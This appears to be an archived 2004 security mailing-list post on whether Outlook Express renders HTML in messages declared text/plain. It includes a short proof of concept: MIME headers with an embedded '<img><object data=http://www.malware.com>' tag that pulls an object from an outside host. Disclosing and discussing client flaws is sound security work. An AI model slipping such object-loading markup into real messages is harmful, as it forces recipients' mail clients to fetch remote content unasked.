OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: OBJECT Bugs or Features

http-equivexcite.com
Date: Tue Jun 08 2004 - 13:21:41 CDT


 <!--

The headers of your example Email message quite
clearly claim the message is multipart/alternative and the first
part (with the "incomplete" OBJECT tag) is text/html. Thus,
although the body of that MIME component is not a properly
formed, complete HTML document, the MIME Content-Type: headers
provide a fairly strong basis for the MUA treating that message
component as HTML and displaying it accordingly.

-->

and the Outlook Express unique ability to still do the
impossible unpatched after three years:

MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

<img><object data=http://www.malware.com>

--
http://www.malware.com